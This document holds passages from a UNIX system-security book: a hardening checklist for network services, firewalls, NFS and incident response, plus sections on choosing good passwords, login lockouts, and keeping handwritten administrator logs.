● Consider getting CALLER*ID/ANI to trace incoming calls automatically. Log the numbers that call your system.
● Physically protect the modems and phone lines.
● Disable third-party billing to your modem lines.
● Consider getting leased lines and/or callback modems.
● Consider using separate callout telephone lines with no dial-in capability for callback schemes.
● Check permissions on all associated devices and configuration files.
● Consider use of encrypting modems with fixed keys to guard against unauthorized use or eavesdropping.

A.1.1.14 Chapter 15: UUCP

● Be sure that every UUCP login has a unique password.
● Set up a different UUCP login for every computer you communicate with via UUCP.
● Make sure that /usr/lib/uucp/L.sys or /usr/lib/uucp/Systems is mode 400, readable only by the UUCP user.
● Do not export UUCP files or commands on a writable NFS partition.
● Make sure that the files in the /usr/lib/uucp directories can't be read or written remotely or locally with the UUCP system.
● Make sure that no UUCP login has /usr/spool/uucp/uucppublic for its home directory.
● Limit UUCP access to the smallest set of directories necessary.
● If there are daily, weekly, or monthly administrative scripts run by cron to clean up the UUCP system, make sure that they are run with the UUCP UID but that they are owned by root.
● Make sure that the ruusend command is not in your L.cmds file (Version 2 UUCP).
● Only allow execution of commands by UUCP that are absolutely necessary.
● Consider making some or all of your UUCP connections use callback to initiate a connection.
● Make sure that mail to the UUCP users gets sent to the system administrator.
● Test your mailer to make sure that it will not deliver a file or execute a command that is encapsulated in an address.
● Disable UUCP over IP unless you need UUCP.
● If the machine has an active FTP service, ensure that all UUCP users are listed in the /etc/ftpusers file.
● Be sure that the UUCP control files are protected and cannot be read or modified using the UUCP program.
● Only give UUCP access to the directories to which it needs access. You may wish to limit UUCP to the directory /usr/spool/uucppublic.
● Limit the commands which can be executed from offsite to those that are absolutely necessary.
● Disable or delete any uucpd daemon if you aren't using it.
● Remove all of the UUCP software and libraries if you aren't going to use them.

A.1.1.15 Chapter 16: TCP/IP Networks

● Consider low-level encryption mechanisms in enterprise networks, or to "tunnel" through external networks.
● Do not depend on IP addresses or DNS information for authentication.
● Do not depend on header information in news articles or email, as it can be forged.

A.1.1.16 Chapter 17: TCP/IP Services

● Routinely examine your inetd configuration file.
● If your standard software does not offer this level of control, consider installing the tcpwrapper program to better regulate and log access to your servers. Then, contact your vendor and ask when equivalent functionality will be provided as a standard feature in the vendors' systems.
● Disable any unneeded network services.
● Consider disabling any services that provide nonessential information to outsiders that might enable them to gather information about your systems.
● Make sure that your version of the ftpd program is up to date.
● If you support anonymous FTP, don't have a copy of your real /etc/passwd as an ~ftp/etc/passwd.
● Make sure that /etc/ftpusers contains at least the account names root, uucp, and bin. The file should also contain the name of any other account that does not belong to an actual human being.
● Frequently scan the files in, and usage of, your ftp account.
● Make sure that all directory permissions and ownership on your ftp account are set correctly.
● If your software allows, configure any "incoming" directories so that files dropped off cannot then be downloaded without operator intervention.
● Make sure that your sendmail program will not deliver mail directly to a file.
● Make sure that your sendmail program does not have a wizard's password set in the configuration file.
● Limit the number of "trusted users" in your sendmail.cf file.
● Make sure that your version of the sendmail program does not support the debug, wiz, or kill commands.
● Delete the "decode" alias in your aliases file. Examine carefully any other alias that delivers to a program or file.
● Make sure that your version of the sendmail program is up to date, with all published patches in place.
● Make sure that the aliases file cannot be altered by unauthorized individuals.
● Consider replacing sendmail with smap, or another more tractable network agent.
● Have an alias for every non-user account so that mail to any valid address gets delivered to a person and not to an unmonitored mailbox.
● Consider disabling SMTP commands such as VRFY and EXPN with settings in your sendmail configuration.
● Disable zone transfers in your DNS, if possible.
● Make sure that you are running the latest version of the nameserver software (e.g., bind) with all patches applied.
● Make sure that all files used by the nameserver software are properly protected against tampering, and perhaps against reading by unauthorized users.
● Use IP addresses instead of domain names in places where the practice makes sense (e.g., in .rhosts files). (But beware that most implementations of trusted commands don't understand IP addresses in .rhosts, and that, in such cases, doing this might introduce a vulnerability.)
● Make sure that TFTP access, if enabled, is limited to a single directory containing boot files.
● Tell your users about the information that the finger program makes available on the network.
● Make sure that your finger program is more recent than November 5, 1988.


● Disable or replace the finger service with something that provides less information.
● If you are using POP or IMAP, configure your system to use APOP or Kerberos for authentication.
● Consider running the authd daemon for all machines in the local net.
● Configure your NNTP or INND server to restrict who can post articles or transfer Usenet news. Make sure that you have the most recent version of the software.
● Block NTP connections from outside your organization.
● Block SNMP connections from outside your organization.
● Disable rexec service unless needed.
● Routinely scan your system for suspicious .rhosts files. Make sure that all existing .rhosts files are protected to mode 600.
● Consider not allowing users to have .rhosts files on your system.
● If you have a plus sign (+) in your /etc/hosts.equiv file, remove it.
● Do not place usernames in your /etc/hosts.equiv file.
● Restrict access to your printing software via the /etc/hosts.lpd file.
● Make your list of trusted hosts as small as possible.
● Block incoming RIP packets; use static routes where possible and practical.
● Disable UUCP over IP unless needed.
● Set up your logindevperm or fbtab files to restrict permissions on frame buffers and devices, if this is possible on your system.
● If your X11 Server blocks on null connections, get an updated version.
● Enable the best X11 authentication possible in your configuration (e.g., Kerberos, Secure RPC, "magic cookies") instead of using xhost.
● Disable the rexd RPC service.
● Be very cautious about installing MUDs, IRCs, or other servers.
● Scan your network connections regularly with netstat.
● Scan your network with tools such as SATAN and ISS to determine if you have uncorrected vulnerabilities - before an attacker does the same.
● Re-evaluate why you are connected to the network at all, and disconnect machines that do not really need to be connected.

A.1.1.17 Chapter 18: WWW Security

● Consider running any WWW server from a Macintosh platform instead of from a UNIX platform.
● Do not run your server as user root. Have it set to run as a nobody user unique to the WWW service.
● Become familiar with all the configuration options for the particular server you use, and set its options appropriately (and conservatively).
● Disable automatic directory listings.
● Set the server to not follow symbolic links, or to only follow links that are owned by the same user that owns the destination of the link.
● Limit or prohibit server-side includes.
● Be extremely cautious about writing and installing CGI scripts or programs. (See the specific programming recommendations in the chapter.) Consider using taintperl as the implementation language.
● Configure your server to only allow CGI scripts from a particular directory under your control.
● Do not mix WWW and FTP servers on the same machine in the same filesystem hierarchy.
● Consider making your WWW server chroot into a protected directory.
● Monitor the logs and usage of your WWW service.
● If you are transferring sensitive information over the WWW connection (e.g., personal information), enable encryption.
● Prevent general access to the server log files.
● Be aware of the potential risks posed by dependence on a limited number of third-party providers.

A.1.1.18 Chapter 19: RPC, NIS, NIS+, and Kerberos

● Enable Kerberos or Secure RPC if possible.
● Use NIS+ in preference to NIS, if possible.
● Use netgroups to restrict access to services, including login.
● Put keylogout in your logout file if you are running secure RPC.
● Make sure that your version of ypbind only listens on privileged ports.
● Make sure that your version of portmapper does not do proxy forwarding.
● If your version of portmapper has a "securenets" feature, configure the program so that it restricts which machines can send requests to your portmapper. If this feature is not present, contact your vendor and ask when it will be supported.
● Make sure that there is an asterisk (*) in the password field of any line beginning with a plus sign (+) in both the passwd and group files of any NIS client.
● Make sure that there is no line beginning with a plus sign (+) in the passwd or group files on any NIS server.
● If you are using Kerberos, understand its limitations.

A.1.1.19 Chapter 20: NFS

●   Program your firewall and routers to block NFS packets.

●   Use NFS version 3, if available, in TCP mode.

●   Use the netgroups mechanism to restrict the export of (and thus the ability to remotely mount) filesystems to a small set of local machines.

●   Mount partitions nosuid unless SUID access is absolutely necessary.

●   Mount partitions nodev, if available.

●   Set root ownership on files and directories mounted remotely.

●   Never export a mounted partition on your system to an untrusted machine if the partition has any world- or group-writable directories.

●   Set the kernel portmon variable to ignore NFS requests from unprivileged ports.

●   Export filesystems to a small set of hosts, using the access= or ro= options (see the example following this list).

●   Do not export user home directories in a writable mode.

●   Do not export filesystems to yourself!

●   Do not use the root= option when exporting filesystems unless absolutely necessary.

●   Use fsirand on all partitions that are exported. Rerun the program periodically.

●   When possible, use the secure option for NFS mounts.

●   Monitor who is mounting your NFS partitions (but realize that you may not have a complete picture because of the stateless nature of NFS).

●   Reconsider why you want to use NFS, and think about doing without. For instance, replicating disk on local machines may be a safer approach.
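The sketch below shows the general idea of a restricted export and a defensive client-side mount. The /etc/exports option syntax here is SunOS-style and differs on other systems, and the host, netgroup, and path names are placeholders only:

# /etc/exports on the server (SunOS-style options; names are examples)
/usr/local   -ro,access=client1:client2
/home        -access=trusted_hosts

# On the client, mount with SUID (and, where supported, device) access disabled:
mount -o nosuid,nodev server:/usr/local /usr/local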

A.1.1.20 Chapter 21: Firewalls

●   Keep in mind that firewalls should be used in addition to other security measures and not in place of them.

●   Consider setting a policy of default deny for your firewall (see the sketch following this list).

●   Consider internal firewalls as well as external firewalls.

●   Use the most complete firewall you can afford and one that makes sense in your environment. At the very least, put a screening router in place.

●   Consider buying a commercially provided and configured firewall, rather than creating your own.

●   Plan on centralizing services such as DNS, email, and Usenet on closely guarded bastion hosts.

●   Break your network up into small, independent subnets. Each subnet should have its own NIS server and netgroups domain.

●   Don't configure any machine to trust machines outside the local subnet.

●   Make sure that user accounts have different passwords for machines on different subnets.

●   Make sure that firewall machines have the highest level of logging.

●   Configure firewall machines without user accounts and program development utilities, if possible.

●   Don't mount NFS directories across subnet boundaries.

●   Have a central mail machine with MX aliasing and name rewriting.

●   Monitor activity on the firewall regularly.

●   Configure your firewall/bastion hosts to remove all unnecessary services and utilities.

●   Keep in mind that firewalls can sometimes fail. Plan accordingly: periodically test your firewall and have defense in depth for that eventuality.

●   Give serious thought to whether or not you really want all your systems to be connected to the rest of the world, even if a firewall is interposed. (See the discussion in the chapter.)
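A default-deny screening policy might look roughly like the fragment below. The syntax is Cisco-style and is shown only as an illustration; the access-list number is arbitrary, 192.0.2.10 stands in for a hypothetical bastion host, and a real filter set would be considerably longer:

! permit replies to connections opened from the inside
access-list 101 permit tcp any any established
! permit inbound SMTP only to the bastion mail host
access-list 101 permit tcp any host 192.0.2.10 eq 25
! everything not explicitly permitted is denied
access-list 101 deny ip any any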

A.1.1.21 Chapter 22: Wrappers and Proxies

●   Consider installing the smap proxy in place of the sendmail program to receive mail over the network.

●   Consider installing the tcpwrapper program to restrict and log access to local network services (see the example following this list).

●   Consider installing the ident/authd service on your system to help track network access. However, remember that the results returned by this service are not completely trustworthy.

●   Consider writing your own wrapper programs to provide extra control or logging for your local system.
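One common tcpwrapper arrangement is a blanket deny with explicit exceptions. The daemon names, domain, and network prefix below are examples to adapt, not a recommendation of which services to expose:

# /etc/hosts.deny - deny anything not explicitly allowed
ALL: ALL

# /etc/hosts.allow - local exceptions (names and addresses are examples)
in.telnetd, in.ftpd: LOCAL, .cs.example.edu
in.fingerd: 192.168.1.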

A.1.1.22 Chapter 23: Writing Secure SUID and Network Programs

●   Convey to your vendors your concern about software quality in their products.

●   Observe the 24 general rules presented in the chapter when writing any software, and especially when writing software that needs extra privileges or trust.

●   Observe the 17 general rules presented in the chapter when writing any network server programs.

●   Observe the 14 general rules presented in the chapter when writing any program that will be SUID or SGID.

●   Think about using chroot for privileged programs.

●   Avoid storing or transmitting passwords in clear text in any application.

●   Be very cautious about generating and using "random" numbers.

A.1.1.23 Chapter 24: Discovering a Break-in

●   Plan ahead: have response plans designed and rehearsed.

●   If a break-in occurs, don't panic!

●   Start a diary and/or script file as soon as you discover or suspect a break-in. Note and timestamp everything you discover and do (see the sketch following this list).

●   Run hardcopies of files showing changes and tracing activity. Initial and time-stamp these copies.

●   Run machine status-checking programs regularly to watch for unusual activity: ps, w, vmstat, etc.

●   If a break-in occurs, consider making a dump of the system to backup media before correcting anything.

●   Carefully examine the system after a break-in. See the chapter text for specifics - there is too much detail to list here. Specifically, be certain that you restore the system to a known, good state.

●   Carefully check backups and logs to determine if this is a single occurrence or is related to a set of incidents.
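Two commands often used at this stage are sketched below. The log file name, tape device, and partition are hypothetical and differ from system to system; on many BSD-derived systems the dump options are written without a leading dash, as shown:

script /safe/incident.log          # record the terminal session to a file as you work
dump 0f /dev/nrst0 /dev/rsd0a      # level-0 dump of a partition to tape before changing anything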

A.1.1.24 Chapter 25: Denial of Service Attacks and Solutions

●   If user quotas are available on your system, enable them.

●   Configure appropriate process and user limits on your system (see the examples following this list).

●   Don't test new software while running as root.

●   Install a firewall to prevent network problems.

●   Educate your users on polite methods of sharing system resources.

●   Run long-running tasks in the background, setting the nice value to a positive number.

●   Configure disk partitions to have sufficient inodes and storage.

●   Make sure that you have appropriate swap space configured.

●   Monitor disk usage and encourage users to archive and delete old files.

●   Consider investing in a network monitor appropriate for your network. Have a spare network connection available, if you need it.

●   Keep available an up-to-date paper list of low-level network addresses (e.g., Ethernet addresses), IP addresses, and machine names.

●   Ensure good physical security for all network cables and connectors.
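A few illustrative commands for the quota, limit, and nice items above. Option syntax differs among versions, and the account and job names are placeholders:

edquota -p protouser newuser      # copy a prototype user's disk quotas to a new account
nice -10 long_batch_job &         # classic usage; some systems spell this nice -n 10
limit coredumpsize 0              # csh built-in: an example of a per-process limit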

A.1.1.25 Chapter 26: Computer Security and U.S. Law

●   Consult with your legal counsel to determine legal options and liability in the event of a security incident.

●   Consult with your insurance carrier to determine if your insurance covers loss from break-ins.

●   Determine if your insurance covers business interruption during an investigation. Also determine if you will be required to institute criminal or civil action to recover on your insurance.

●   Replace any "welcome" messages with warnings against unauthorized use (see the sample banner following this list).

●   Put explicit copyright and/or proprietary property notices in code start-up screens and source code.

●   Formally register copyrights on your locally developed code and databases.

●   Keep your backups separate from your machine.

●   Keep written records of your actions when investigating an incident. Time-stamp and initial media, printouts, and other materials as you proceed.

●   Develop contingency plans and response plans in advance of difficulties.

●   Define, in writing, levels of user access and responsibility. Have all users provide a signature noting their understanding of and agreement to such a statement. Include an explicit statement about the return of manuals, printouts, and other information upon user departure.

●   Develop contacts with your local law-enforcement personnel.

●   Do not be unduly hesitant about reporting a computer crime and involving law-enforcement personnel.

●   If called upon to help in an investigation, request a signed statement by a judge requesting (or directing) your "expert" assistance. Recommend a disinterested third party to act as an expert, if possible.

●   Expand your professional training and contacts by attending security training sessions or conferences. Consider joining security-related organizations.

●   Be aware of other liability concerns.

●   Restrict access to cryptographic software from the network.

●   Restrict or prohibit access to material that could lead to legal difficulties. This includes copyrighted material, pornographic material, trade secrets, etc.

●   Make sure that users understand copyright and license restrictions on commercial software, images, and sound files.

●   Prohibit or restrict access to Usenet from organizational machines. Consider coupling this to provision of personal accounts with an independent service provider.

●   Make your users aware of the dangers of electronic harassment or defamation.

●   Make certain that your legal counsel is consulted before you provide locally developed software to others outside your organization.
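A banner of the following general form is often placed in /etc/motd (and, where supported, in the pre-login /etc/issue or service banner files). The wording below is only an example; the actual text should come from your legal counsel:

This system is for authorized use only.  Use of this system constitutes
consent to monitoring.  Unauthorized access or use is prohibited and may
be subject to criminal and/or civil penalties.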

A.1.1.26 Chapter 27: Who Do You Trust?

●   Read the chapter. Develop a healthy sense of paranoia.

●   Protest when vendors attempt to sell you products advertised with "hacker challenges" instead of more reliable proof of good design and testing.

●   Make your vendor aware of your concerns about security, adequate testing, and fixing security bugs in a timely fashion.

●   Buy another 1000 copies of this book for all your friends and acquaintances. The copies will make you intelligent, attractive, and incredibly popular. Trust us on this.

A.1.1.27 Appendix B: Important Files

●   Become familiar with the important files on your system.

●   Understand why SUID/SGID files have those permissions.

A.1.1.28 Appendix C: UNIX Processes

●   Understand how processes work on your system.

●   Understand the commands that are available to manipulate processes on your system.

A.1.1.29 Appendix D: Paper Sources

●   Paper Sources

A.1.1.30 Appendix E: Electronic Resources

●   Electronic Resources

A.1.1.31 Appendix F: Organizations

●   Learn more about security.

●   Explore other resources concerning security, UNIX, and the Internet.

●   Monitor newsgroups, mailing lists, and other resources that will help you stay current on threats and countermeasures.

●   Explore professional opportunities that enable you to network with other professionals, and add to your knowledge and experience.

A.1.1.32 Appendix G: Table of IP Services

●   Read the table and add your own site notes indicating the services you do and do not wish to support.


Chapter 3<br />

Users and Passwords<br />

3.6 The Care and Feeding of Passwords<br />

Although passwords are the most important element of computer security, users often receive only<br />

cursory instructions about selecting them.<br />

If you are a user, be aware that by picking a bad password - or by revealing your password to an<br />

untrustworthy individual - you are potentially compromising your entire computer's security. If you are a<br />

system administrator, be sure that all of your users are familiar with the issues raised in this section.<br />

3.6.1 Bad Passwords: Open Doors<br />

A bad password is any password that is easily guessed.<br />

In the movie Real Genius, a computer recluse named Laszlo Hollyfeld breaks into a top-secret military<br />

computer over the telephone by guessing passwords. Laszlo starts by typing the password AAAAAA, then<br />

trying AAAAAB, then AAAAAC, and so on, until he finally finds the password that matches.<br />

Real-life computer crackers are far more sophisticated. Instead of typing each password by hand,<br />

crackers use their computers to make phone calls (or open network connections) and try the

passwords, automatically retrying when they are disconnected. Instead of trying every combination of<br />

letters, starting with AAAAAA (or whatever), crackers use hit lists of common passwords such as wizard<br />

or demo. Even a modest home computer with a good password guessing program can try thousands of<br />

passwords in less than a day's time. Some hit lists used by crackers are several hundred thousand words<br />

in length.[8] Therefore, a password that anybody else might use for his own password is probably a bad<br />

choice for you.<br />

[8] In contrast, if you were to program a home computer to try all 6-letter combinations<br />

from AAAAAA to ZZZZZZ, it would have to try 308,915,776 different passwords. Guessing<br />

one password per second, that would require nearly ten years.<br />

What's a popular and bad password? Some examples are your name, your partner's name, or your parents'<br />

names. Other bad passwords are these names backwards or followed by a single digit. Short passwords<br />

are also bad, because there are fewer of them: they are, therefore, more easily guessed. Especially bad are<br />

"magic words" from computer games, such as xyzzy. They look secret and unguessable, but in fact are<br />

widely known. Other bad choices include phone numbers, characters from your favorite movies or<br />

books, local landmark names, favorite drinks, or famous computer scientists (see the sidebar later in this<br />

chapter for still more bad choices). These words backwards or capitalized are also weak. Replacing the<br />


letter "l" (lowercase "L") with "1" (numeral one), or "E" with "3," adding a digit to either end, or other<br />

simple modifications of common words are also weak. Words in other languages are no better.<br />

Dictionaries for dozens of languages are available for download on the <strong>Internet</strong> and dozens of bulletin<br />

board systems.<br />

Many versions of <strong>UNIX</strong> make a minimal attempt to prevent users from picking bad passwords. For<br />

example, under some versions of <strong>UNIX</strong>, if you attempt to pick a password with fewer than six letters that<br />

are all of the same case, the passwd program will ask you to "Please use a longer password." After

three tries, however, the program relents and lets the user pick a short one. Better versions allow the<br />

administrator to require a minimum number of letters, a requirement for nonalphabetic characters, and<br />

other restrictions. However, some administrators turn these requirements off because users complain<br />

about them; this is a bad idea. Users will complain more loudly if their computers are broken into.<br />

Bad Passwords<br />

When picking passwords, avoid the following:<br />

●   Your name, spouse's name, or partner's name.

●   Your pet's name or your child's name.

●   Names of close friends or coworkers.

●   Names of your favorite fantasy characters.

●   Your boss's name.

●   Anybody's name.

●   The name of the operating system you're using.

●   Information in the GECOS field of your passwd file entry.

●   The hostname of your computer.

●   Your phone number or your license plate number.

●   Any part of your social security number.

●   Anybody's birth date.

●   Other information easily obtained about you (e.g., address, alma mater).

●   Words such as wizard, guru, gandalf, and so on.

●   Any username on the computer in any form (as is, capitalized, doubled, etc.).

●   A word in the English dictionary or in a foreign dictionary.

●   Place names or any proper nouns.

●   Passwords of all the same letter.

●   Simple patterns of letters on the keyboard, like qwerty.

●   Any of the above spelled backwards.

●   Any of the above followed or prepended by a single digit.

3.6.2 Smoking Joes<br />

Surprisingly, experts believe that a significant percentage of all computers without password content<br />

controls contain at least one account where the username and the password are the same. Such accounts<br />

are often called "Joes." Joe accounts are easy for crackers to find and trivial to penetrate. Most computer<br />

crackers can find an entry point into almost any system simply by checking every account to see whether<br />

it is a Joe account. This is one reason why it is dangerous for your computer to make a list of all of the<br />

valid usernames available to the outside world.<br />

3.6.3 Good Passwords: Locked Doors<br />

Good passwords are passwords that are difficult to guess. The best passwords are difficult to guess<br />

because they:<br />

●   Have both uppercase and lowercase letters.

●   Have digits and/or punctuation characters as well as letters.

●   May include some control characters and/or spaces.

●   Are easy to remember, so they do not have to be written down.

●   Are seven or eight characters long.

●   Can be typed quickly, so somebody cannot determine what you type by watching over your shoulder.

It's easy to pick a good password. Here are some suggestions:<br />

●   Take two short words and combine them with a special character or a number, like robot4my or eye-con.

●   Put together an acronym that's special to you, like Notfsw (None Of This Fancy Stuff Works), auPEGC (All UNIX programmers eat green cheese), or Ttl*Hiww (Twinkle, twinkle, little star. How I wonder what...).


Of course, robot4my, eye-con, Notfsw, Ttl*Hiww and auPEGC are now all bad passwords because<br />

they've been printed here.<br />

Number of Passwords<br />

If you exclude a few of the control characters that should not be used in a password, it is still possible to<br />

create more than 43,000,000,000,000,000 unique passwords in standard <strong>UNIX</strong>.<br />

Combining dictionaries from 10 different major languages, plus those words reversed, capitalized, with a<br />

trailing digit appended, and otherwise slightly modified results in less than 5,000,000 words. Adding a<br />

few thousand names and words from popular culture hardly changes that.<br />

From this, we can see that users who pick weak passwords are making it easy for attackers - they reduce<br />

the search space to less than .000000012% of the possible passwords!
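To see roughly where these figures come from (the character-set size here is an assumption made only for illustration): with about 120 usable characters in each of eight significant positions, there are about 120^8, or roughly 4.3 × 10^16, possible passwords. A 5,000,000-word hit list therefore covers only about 5 × 10^6 / 4.3 × 10^16, or 1.2 × 10^-10, of that space - about .000000012%.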

One study of passwords chosen in an unconstrained environment[9] revealed that users chose passwords<br />

with control characters only 1.4% of the time, and punctuation and space characters less than 6% of the<br />

time. All of the characters !@#$%^&*()_-+=[]|\;:"?/,.`~' can be used in passwords too, although some

systems may treat the "\", "#", and "@" symbols as escape (literal), erase, and kill, respectively. (See the<br />

footnote to the earlier sidebar entitled "Forcing a Change of Password" for a list of the control characters<br />

that should not be included in a password.)<br />

[9] See the reference to "Observing Reusable Password Choices" in Appendix D, Paper<br />

Sources.<br />

Next time one of your users complains because of the password selection restrictions you have in place<br />

and proclaims, "I can't think of any password that isn't rejected by the program!", you might show him<br />

this page.<br />

3.6.4 Passwords on Multiple Machines<br />

If you have several computer accounts, you may wish to have the same password on every machine, so<br />

you have less you need to remember. However, if you have the same password on many machines and<br />

one of those machines is compromised, all of your accounts are compromised. One common approach<br />

used by people with accounts on many machines is to have a base password that can be modified for<br />

each different machine. For example, your base password might be kxyzzy followed by the first letter of<br />

the name of the computer you're using. On a computer named athena your password would be kxyzzya,<br />

while on a computer named ems your password would be kxyzzye. (Don't, of course, use exactly this<br />

method of varying your passwords.)<br />

3.6.5 Writing Down Passwords<br />

There is a tired story about a high school student who broke into his school's academic computer and<br />

changed his grades; he did this by walking into the school's office, looking at the academic officer's<br />

terminal, and writing down the telephone number, username, and password that were printed on a Post-It<br />

note.<br />


Unfortunately, the story is true - hundreds of times over.<br />

Users are admonished to "never write down your password." The reason is simple enough: if you write<br />

down your password, somebody else can find it and use it to break into your computer. A password that<br />

is memorized is more secure than the same password written down, simply because there is less<br />

opportunity for other people to learn it. On the other hand, a password that must be written down to be<br />

remembered is quite likely a password that is not going to be guessed easily. If you write your password<br />

on something kept in your wallet, the chances of somebody who steals your wallet using the password to<br />

break into your computer account are remote indeed.[10]<br />

[10] Unless, of course, you happen to be an important person, and your wallet is stolen or<br />

rifled as part of an elaborate plot. In their book Cyberpunk, authors John Markoff and Katie

Hafner describe a woman called "Susan Thunder" who broke into military computers by<br />

doing just that: she would pick up officers at bars and go home with them. Later that night,<br />

while the officer was sleeping, Thunder would get up, go through the man's wallet, and look<br />

for telephone numbers, usernames, and passwords.<br />

If you must write down your password, then at least follow a few precautions:<br />

●   When you write it down, don't identify your password as being a password.

●   Don't include the name of the account, network name, or the phone number of the computer on the same piece of paper as your password.

●   Don't attach the password to your terminal, keyboard, or any part of your computer.

●   Don't write your actual password. Instead, disguise it, by mixing in other characters or by scrambling the written version of the password in a way that you can remember. For example, if your password is "Iluvfred", you might write "fredIluv" or "vfredxyIu" or perhaps "Last week, I lost Uncle Vernon's `fried rice & eggplant delight' recipe - remember to call him after 3 p.m." - to throw off a potential wallet-snatcher.[11]

[11] We hope that last one required some thought. The 3 p.m. means to start with the<br />

third word and take the first letter of every word. With some thought, you can come<br />

up with something equally obscure that you will remember.<br />

Here are some other things to avoid:<br />

●   Don't record a password online (in a file, in a database, or in an email message), unless the password is encrypted.

●   Likewise, never send a password to another user via electronic mail. In The Cuckoo's Egg, Cliff Stoll tells of how a single intruder broke into system after system by searching for the word "password" in text files and electronic mail messages. With this simple trick, the intruder learned of the passwords of many accounts on many different computers across the country.

●   Don't use your login password as the password of application programs. For instance, don't use your login password as your password to an on-line MUD (multi-user dungeon) game or for a World Wide Web server account. The passwords in those applications are controlled by others and may be visible to the wrong people.

●   Don't use the same password for different computers managed by different organizations. If you do, and an attacker learns the password for one of your accounts, all will be compromised.

This last "don't" is very difficult to follow in practice.<br />

Using Passwords in More Than One Place<br />

Alec Muffett, the author of the Crack program (discussed in Chapter 8), related an entertaining story to<br />

us about the reuse of passwords, in more than one place, which we paraphrase here.<br />

A student friend of Alec's (call him Bob) spent a co-op year at a major computer company site. During<br />

his vacations and on holidays, he'd come back to school and play AberMUD (a network-based game) on<br />

Alec's computer. One of Bob's responsibilities at the company involved system management. The<br />

company was concerned about security, so all passwords were random strings of letters with no sensible<br />

pattern or order.<br />

One day, Alec fed the AberMUD passwords into his development version of the Crack program as a<br />

dictionary, because they were stored on his machine as plain text. He then ran this file against his system<br />

user-password file, and found a few student account passwords. He had the students change their<br />

passwords, and he then forgot about the matter.<br />

Some time later, Alec posted a revised version of the Crack program and associated files to the Usenet.<br />

They ended up in one of the sources newsgroups and were distributed quite widely. Eventually, after a<br />

trip of thousands of miles around the world, they came to Bob's company. Bob, being a concerned<br />

administrator, decided to download the files and check them against his company's passwords. Imagine<br />

Bob's shock and horror when the widely distributed Crack promptly churned out a match for his<br />

randomly chosen, super-secret root password!<br />

The moral of the story is that you should teach your users to never use their account passwords in other<br />

applications or on other systems outside the same administrative domain. They never know when those<br />

passwords might come back to haunt them! (And programs like AberMUD should be modified to store<br />

passwords encrypted with one-way hash functions.)<br />


Chapter 3<br />

Users and Passwords<br />

3.3 Entering Your Password<br />

Telling the computer your password is the way that you prove to the computer that you are you. In<br />

classical security parlance, your password is what the computer uses to authenticate your identity (two<br />

words that have a lot of significance to security gurus, but generally mean the same thing that they do to<br />

ordinary people).<br />

When you log in, you tell the computer who you are by typing your username at the login prompt. You<br />

then type your password (in response to the password prompt) to prove that you are who you claim to be.<br />

For example:<br />

login: sarah<br />

password: tuna4fis<br />

As we mentioned above, <strong>UNIX</strong> does not display your password when you type it.<br />

If the password that you supply with your username corresponds to the one on file, <strong>UNIX</strong> logs you in and<br />

gives you full access to all of your files, commands, and devices. If either the password or the username<br />

does not match, <strong>UNIX</strong> does not log you in.<br />

On some versions of <strong>UNIX</strong>, if somebody tries to log into your account and supplies an invalid password<br />

several times in succession, your account will be locked. A locked account can be unlocked only by the<br />

system administrator. Locking has two functions:<br />

1.  It protects the system from someone who persists in trying to guess a password; before they can guess the correct password, the account is shut down.

2.  It notifies you that someone has been trying to break into your account.

If you find yourself locked out of your account, you should contact your system administrator and get<br />

your password changed to something new. Don't change your password back to what it was before you<br />

were locked out.<br />

NOTE: The automatic lockout feature can prevent unauthorized use, but it can also be used<br />

to conduct denial of service attacks, or by an attacker to lock selected users out of the<br />

system so as to prevent discovery of his actions. A practical joker can use it to annoy fellow<br />

employees or students. And you can lock yourself out if you try to log in too many times<br />

before you've had your morning coffee. In our experience, indefinite automatic lockouts<br />

aren't particularly helpful. A much better method is to employ an increasing delay<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch03_03.htm (1 of 2) [2002-04-12 10:44:35]


[Chapter 3] 3.3 Entering Your Password<br />

mechanism in the login. After a fixed number of unsuccessful logins, an increasing delay<br />

can be inserted between each successive prompt. Implementing such delays in a network<br />

environment requires maintaining a record of failed login attempts, so that the delay cannot<br />

be circumvented by an attacker who merely disconnects from the target machine and<br />

reconnects.<br />

AIX version 4 can be configured for increased delays at successive login prompts by editing<br />

the logindelay variable in the file /etc/security/login.cfg. AIX also supports automatic<br />

locking of terminals with automatic reenablement after some time with the logindisable and<br />

loginreenable attributes in the same file.<br />

The Linux operating system gives the user 10 chances to log in, with an increasing delay<br />

after each attempt. This achieves essentially the same goal as a lockout (preventing someone<br />

from trying lots of passwords within a short amount of time), but it limits denial of service<br />

attacks as well.<br />
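For the AIX attributes mentioned in the note above, the relevant stanza in /etc/security/login.cfg looks roughly like the sketch below. The values are arbitrary examples, and the exact attribute set, units, and placement (the default stanza versus a per-port stanza) should be checked against your AIX documentation:

default:
        logindelay = 5
        logindisable = 10
        loginreenable = 30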


Chapter 10
Auditing and Logging

10.7 Handwritten Logs

Another type of logging that can help you with security is not done by the computer at all; it is done by<br />

you and your staff. Keep a log book that records your day's activities. Log books should be kept on paper<br />

in a physically secure location. Because you keep them on paper, they cannot be altered by someone<br />

hacking into your computer even as superuser. They will provide a nearly tamper-proof record of<br />

important information.<br />

Handwritten logs have several advantages over online logs:<br />

●   They can record many different kinds of information. For example, your computer will not record a suspicious telephone call or a bomb threat, but you can (and should) record these occurrences in your log book.

●   If the systems are down, you can still access your paper logs. (Thus, this is a good place to keep a copy of account numbers and important phone numbers for field service, service contacts, and your own key personnel.)

●   If disaster befalls your disks, you can recreate some vital information from paper, if it is in the log book.

●   If you keep the log book as a matter of course, and you enter into it printed copies of your exception logs, such information might be more likely to be accepted into court proceedings as business records. This advantage is important if you are in a situation where you need to pursue criminal or civil legal action.

●   Juries are more easily convinced that paper logs are authentic, as opposed to computer logs.

●   Having copies of significant information in the log book keeps you from having to search all the disks on all your workstations for some selected information.

●   If all your other tools fail or might have been compromised, holding an old printout and a new printout of the same file together and up to a bright light may be a quick way to reveal changes.

Think of your log book as a laboratory notebook, except the laboratory is your own computer center.<br />

Each page should be numbered. You should not rip pages out of your book. Write in ink, not pencil. If<br />

you need to cross something out, draw a single line, but do not make the text that you are scratching out<br />

unreadable. Keep your old log books.<br />


The biggest problem with log books is the amount of time you need to keep them up to date. These are<br />

not items that can be automated with a shell script. Unfortunately, this time requirement is the biggest<br />

reason why many administrators are reluctant to keep logs - especially at a site with hundreds (or<br />

thousands) of machines, each of which might require its own log book. We suggest you try to be creative<br />

and think of some way to balance the need for good records against the drudgery of keeping multiple<br />

books up to date. Compressing information, and keeping logs for each cluster of machines is one way to<br />

reduce the overhead while receiving (nearly) the same benefit.<br />

